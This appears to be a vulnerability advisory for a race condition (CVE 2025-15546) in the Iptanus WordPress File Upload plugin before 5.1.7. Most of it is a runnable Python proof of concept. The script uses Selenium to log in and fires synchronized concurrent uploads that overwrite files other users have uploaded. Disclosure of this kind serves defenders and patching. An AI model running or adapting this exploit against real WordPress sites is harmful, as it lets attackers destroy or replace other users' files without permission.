Iptanus File Upload < 5.1.7 – File Overwrite via Race Condition | CVE 2025-15546

Description

The plugin does not implement proper file handling when the duplicatepolicy setting is configured to "maintain both." Due to a Time-of-Check to Time-of-Use (TOCTOU) race condition between the file existence check and the actual file write operation, an authenticated attacker can overwrite files uploaded by other users.

Proof of Concept

```
#!/usr/bin/env python3
"""
PoC for WordPress Plugin wp-file-upload File Upload Race Condition
Luca Jungnickel
"""

import argparse
import os
import tempfile
import threading
import time
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.firefox.options import Options


class SeleniumRacePoC:
    def __init__(self, target_url, page_id, username="admin", password="admin123"):
        self.target_url = target_url.rstrip('/')
        self.page_url = f"{self.target_url}/?page_id={page_id}"
        self.username = username
        self.password = password
        self.upload_count = 0
        self.lock = threading.Lock()

    def create_driver(self, headless=True):
        options = Options()
        if headless:
            options.add_argument('--headless')
        options.add_argument('--no-sandbox')
        options.add_argument('--disable-dev-shm-usage')
        driver = webdriver.Firefox(options=options)
        driver.set_page_load_timeout(30)
        return driver

    def login(self, driver):
        try:
            driver.get(f"{self.target_url}/wp-login.php")
            driver.find_element(By.ID, "user_login").send_keys(self.username)
            driver.find_element(By.ID, "user_pass").send_keys(self.password)
            driver.find_element(By.ID, "wp-submit").click()
            time.sleep(2)
            return True
        except Exception as e:
            print(f"[!] Login failed: {e}")
            return False

    def upload_file_thread(self, thread_id, file_path, barrier):
        driver = None
        try:
            driver = self.create_driver(headless=True)

            if not self.login(driver):
                return

            driver.get(self.page_url)
            time.sleep(1)

            file_input = driver.find_element(By.CSS_SELECTOR, "input[type='file']")

            print(f"[Thread-{thread_id}] Ready, waiting...")
            barrier.wait()

            file_input.send_keys(file_path)
            driver.find_element(By.CSS_SELECTOR, "input[value='Upload File']").click()
            time.sleep(3)

            if 'success' in driver.page_source.lower():
                with self.lock:
                    self.upload_count += 1
                    count = self.upload_count
                print(f"[Thread-{thread_id}] ✓ Upload #{count} SUCCESS!")
            else:
                print(f"[Thread-{thread_id}] Upload status unclear")

        except Exception as e:
            print(f"[Thread-{thread_id}] ✗ Error: {e}")
        finally:
            if driver:
                driver.quit()

    def race_attack(self, filename, num_threads=5):
        print(f"\n{'='*70}")
        print(f"RACE CONDITION ATTACK - Threads: {num_threads}, File: {filename}")
        print(f"Target: {self.page_url}")
        print(f"{'='*70}\n")

        barrier = threading.Barrier(num_threads)
        threads = []
        base_tmpdir = tempfile.mkdtemp(prefix="race_")

        for i in range(num_threads):
            thread_dir = os.path.join(base_tmpdir, f"thread_{i}")
            os.makedirs(thread_dir, exist_ok=True)

            file_path = os.path.join(thread_dir, filename)
            with open(file_path, "w") as f:
                f.write(f"file content thread_{i}")

            thread = threading.Thread(
                target=self.upload_file_thread,
                args=(i, file_path, barrier),
                daemon=True
            )
            threads.append(thread)

        start_time = time.time()
        for thread in threads:
            thread.start()
        for thread in threads:
            thread.join()

        elapsed = time.time() - start_time
        print(f"\n{'='*70}")
        print(f"RESULTS: {self.upload_count}/{num_threads} uploads in {elapsed:.2f}s")
        print(f"{'='*70}\n")

        return self.upload_count

def main():
    parser = argparse.ArgumentParser(description='WordPress File Upload Race Condition PoC')
    parser.add_argument('target_url', help='WordPress URL')
    parser.add_argument('-p', '--page-id', type=int, required=True, help='Upload page ID')
    parser.add_argument('-f', '--filename', default='poc-race-condition.txt', help='Filename')
    parser.add_argument('-t', '--threads', type=int, default=5, help='Number of threads')
    parser.add_argument('-u', '--username', default='test', help='WordPress username')
    parser.add_argument('-P', '--password', default='test123', help='WordPress password')

    args = parser.parse_args()

    poc = SeleniumRacePoC(args.target_url, args.page_id, args.username, args.password)
    success_count = poc.race_attack(args.filename, args.threads)

    return 0 if success_count > 0 else 1


if __name__ == '__main__':
    exit(main())
```